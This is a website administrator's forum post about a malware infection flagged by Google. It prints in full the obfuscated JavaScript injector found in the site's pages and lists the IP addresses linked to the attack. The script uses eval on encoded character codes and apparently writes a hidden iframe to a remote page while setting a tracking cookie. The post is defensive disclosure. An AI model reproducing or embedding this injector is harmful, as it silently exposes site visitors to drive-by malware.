Website Malware Cleaning |
|
|||||||||
Website Malware Cleaning |
5 Oct 2013, 12:48 PM
Post
#1
|
|
Administrator Group: Admin Posts: 111561 Joined: 3-June 05 From: Athens, Greece Member No.: 1 Zodiac Sign: Gender: |
We had a long way to deal with malware on our website, nonetheless such things happens ( to put it nicely )
We received a Google notification this morning by their automated monitoring tools about malware infection on the website. "We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com." So we started checking all server logs on this and we managed to locate the exact timeframe, method but still working on the exploit We can and will undisclose the full embedded malware code here along with all traced IPs that were related to the malicious attachs CODE <!--32f02e--><script type="text/javascript" language="javascript">mjgp="y";uxy="document";try{+function(){if(document.querySelector)--(window [uxy].getElementById("asd"))}()}catch(rxhga){sni=function(eifnkj){eifnkj="fro"+eifnkj;for(lmfx=0;lmfx<mjgp.length;lmfx++){hdrqg+=String[eifnkj] (xven(zdram+(mjgp[lmfx]))-(17));}};};xven=(window.eval);zdram="0x";zxiqiu=0;if(!zxiqiu){try{++xven(uxy)["\x62o"+"d"+mjgp]}catch(rxhga) {nzgmoa="(";}mjgp="31(77(86(7f(74(85(7a(80(7f(31(84(41(4a(39(3a(31(8c(1e(1b(31(87(72(83(31(84(85(72(85(7a(74(4e(38(72(7b(72(89(38(4c(1e(1b(31 (87(72(83(31(74(80(7f(85(83(80(7d(7d(76(83(4e(38(7a(7f(75(76(89(3f(81(79(81(38(4c(1e(1b(31(87(72(83(31(84(31(4e(31(75(80(74(86(7e(76(7f(85(3f (74(83(76(72(85(76(56(7d(76(7e(76(7f(85(39(38(7a(77(83(72(7e(76(38(3a(4c(1e(1b(1e(1b(31(84(3f(84(83(74(31(4e(31(38(79(85(85(81(4b(40(40(7e(7a (7f(75(77(86(7d(74(7a(85(8a(3f(74(80(7e(40(57(7a(7f(76(36(43(41(84(7d(7a(75(76(83(40(55(73(54(79(7e(44(5d(5c(3f(81(79(81(38(4c(1e(1b(31(84(3f (84(85(8a(7d(76(3f(81(80(84(7a(85(7a(80(7f(31(4e(31(38(72(73(84(80(7d(86(85(76(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(74(80(7d(80(83(31(4e(31 (38(44(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(79(76(7a(78(79(85(31(4e(31(38(44(81(89(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(88(7a(75(85(79(31 (4e(31(38(44(81(89(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(7d(76(77(85(31(4e(31(38(42(41(41(41(44(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(85(80 (81(31(4e(31(38(42(41(41(41(44(38(4c(1e(1b(1e(1b(31(7a(77(31(39(32(75(80(74(86(7e(76(7f(85(3f(78(76(85(56(7d(76(7e(76(7f(85(53(8a(5a(75(39(38 (84(38(3a(3a(31(8c(1e(1b(31(75(80(74(86(7e(76(7f(85(3f(88(83(7a(85(76(39(38(4d(81(31(7a(75(4e(6d(38(84(6d(38(31(74(7d(72(84(84(4e(6d(38(84(41 (4a(6d(38(31(4f(4d(40(81(4f(38(3a(4c(1e(1b(31(75(80(74(86(7e(76(7f(85(3f(78(76(85(56(7d(76(7e(76(7f(85(53(8a(5a(75(39(38(84(38(3a(3f(72(81(81 (76(7f(75(54(79(7a(7d(75(39(84(3a(4c(1e(1b(31(8e(1e(1b(8e(1e(1b(77(86(7f(74(85(7a(80(7f(31(64(76(85(54(80(80(7c(7a(76(39(74(80(80(7c(7a(76(5f (72(7e(76(3d(74(80(80(7c(7a(76(67(72(7d(86(76(3d(7f(55(72(8a(84(3d(81(72(85(79(3a(31(8c(1e(1b(31(87(72(83(31(85(80(75(72(8a(31(4e(31(7f(76(88 (31(55(72(85(76(39(3a(4c(1e(1b(31(87(72(83(31(76(89(81(7a(83(76(31(4e(31(7f(76(88(31(55(72(85(76(39(3a(4c(1e(1b(31(7a(77(31(39(7f(55(72(8a(84 (4e(4e(7f(86(7d(7d(31(8d(8d(31(7f(55(72(8a(84(4e(4e(41(3a(31(7f(55(72(8a(84(4e(42(4c(1e(1b(31(76(89(81(7a(83(76(3f(84(76(85(65(7a(7e(76(39(85 (80(75(72(8a(3f(78(76(85(65(7a(7e(76(39(3a(31(3c(31(44(47(41(41(41(41(41(3b(43(45(3b(7f(55(72(8a(84(3a(4c(1e(1b(31(75(80(74(86(7e(76(7f(85(3f (74(80(80(7c(7a(76(31(4e(31(74(80(80(7c(7a(76(5f(72(7e(76(3c(33(4e(33(3c(76(84(74(72(81(76(39(74(80(80(7c(7a(76(67(72(7d(86(76(3a(1e(1b(31(3c (31(33(4c(76(89(81(7a(83(76(84(4e(33(31(3c(31(76(89(81(7a(83(76(3f(85(80(58(5e(65(64(85(83(7a(7f(78(39(3a(31(3c(31(39(39(81(72(85(79(3a(31(50 (31(33(4c(31(81(72(85(79(4e(33(31(3c(31(81(72(85(79(31(4b(31(33(33(3a(4c(1e(1b(8e(1e(1b(77(86(7f(74(85(7a(80(7f(31(58(76(85(54(80(80(7c(7a(76 (39(31(7f(72(7e(76(31(3a(31(8c(1e(1b(31(87(72(83(31(84(85(72(83(85(31(4e(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f(7a(7f(75(76(89(60 (77(39(31(7f(72(7e(76(31(3c(31(33(4e(33(31(3a(4c(1e(1b(31(87(72(83(31(7d(76(7f(31(4e(31(84(85(72(83(85(31(3c(31(7f(72(7e(76(3f(7d(76(7f(78(85 (79(31(3c(31(42(4c(1e(1b(31(7a(77(31(39(31(39(31(32(84(85(72(83(85(31(3a(31(37(37(1e(1b(31(39(31(7f(72(7e(76(31(32(4e(31(75(80(74(86(7e(76(7f (85(3f(74(80(80(7c(7a(76(3f(84(86(73(84(85(83(7a(7f(78(39(31(41(3d(31(7f(72(7e(76(3f(7d(76(7f(78(85(79(31(3a(31(3a(31(3a(1e(1b(31(8c(1e(1b(31 (83(76(85(86(83(7f(31(7f(86(7d(7d(4c(1e(1b(31(8e(1e(1b(31(7a(77(31(39(31(84(85(72(83(85(31(4e(4e(31(3e(42(31(3a(31(83(76(85(86(83(7f(31(7f(86 (7d(7d(4c(1e(1b(31(87(72(83(31(76(7f(75(31(4e(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f(7a(7f(75(76(89(60(77(39(31(33(4c(33(3d(31(7d (76(7f(31(3a(4c(1e(1b(31(7a(77(31(39(31(76(7f(75(31(4e(4e(31(3e(42(31(3a(31(76(7f(75(31(4e(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f (7d(76(7f(78(85(79(4c(1e(1b(31(83(76(85(86(83(7f(31(86(7f(76(84(74(72(81(76(39(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f(84(86(73(84 (85(83(7a(7f(78(39(31(7d(76(7f(3d(31(76(7f(75(31(3a(31(3a(4c(1e(1b(8e(1e(1b(7a(77(31(39(7f(72(87(7a(78(72(85(80(83(3f(74(80(80(7c(7a(76(56(7f (72(73(7d(76(75(3a(1e(1b(8c(1e(1b(7a(77(39(58(76(85(54(80(80(7c(7a(76(39(38(87(7a(84(7a(85(76(75(70(86(82(38(3a(4e(4e(46(46(3a(8c(8e(76(7d(84 (76(8c(64(76(85(54(80(80(7c(7a(76(39(38(87(7a(84(7a(85(76(75(70(86(82(38(3d(31(38(46(46(38(3d(31(38(42(38(3d(31(38(40(38(3a(4c(1e(1b(1e(1b(84 (41(4a(39(3a(4c(1e(1b(8e(1e(1b(8e".split(nzgmoa);hdrqg="";sni("mCharCode");xven(""+hdrqg);}</script><!--/32f02e--> IPs CODE 66.39.3.161 5.199.161.25 161.58.174.175 64.71.32.11 205.186.180.10 173.254.40.162 98.118.152.139 84.154.221.218 213.115.125.17 -------------------- |
|
Lo-Fi Version | Time is now: 18th April 2024 - 01:34 PM |
Skin and Graphics by Dan Ellis and Anubis. Hosting by Forums & More © 2005-2011. |